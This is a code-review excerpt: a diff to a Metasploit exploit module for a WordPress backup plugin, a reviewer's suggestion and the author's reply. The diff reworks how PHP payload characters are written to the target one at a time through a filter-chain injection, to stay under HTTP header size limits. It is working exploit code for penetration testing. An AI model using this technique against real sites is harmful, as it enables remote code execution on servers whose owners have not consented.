modules/exploits/multi/http/wp_backup_migration_php_filter.rb

```diff
@@ -94,9 +93,22 @@ def send_payload(payload)
   end
 
   def write_to_payload_file(string_to_write)
+
+    # Because the payload is base64 encoded and then each character is translated into it's corresponding php filter chain,
+    # the payload becomes quite large and we start to hit limitations due to the HTTP header size.
+    # For example this payload: "<?php fwrite(fopen("G", "a"),"\x73");?>", ends up being 7721 characters long.
+    # The payload size limit on the target I was testing seemed to be around 8000 characters.
+    # Using the following: <?php file_put_contents("file.php","char",FILE_APPEND);?> (more elegant solution) exceeds the
+    # size limit which is why I ended up using <?php fwrite(fopen("<single_char_filename>", "char" ?> and then after
+    # copying the single_char_filename to a filename with a .php extension to be executed.
+
+    single_char_filename = Rex::Text.rand_text_alpha(1)
     string_to_write.each_char do |char|
-      send_payload("<?php `echo -n '#{'\\x' + char.unpack('H2')[0]}'>>#{datastore['PAYLOAD_FILENAME']}`;?>")
+      send_payload("<?php fwrite(fopen(\"#{single_char_filename}\",\"a\"),\"#{'\\x' + char.unpack('H2')[0]}\");?>")
```

Comment:
```suggestion
      send_payload("<?php fwrite(fopen('#{single_char_filename}','a'),\"#{'\\x' + char.unpack('H2')[0]}\");?>")
```

Reply:
I tested this, unfortunately the payload cannot contain single quotes. Leaving this suggestion out, thank you though!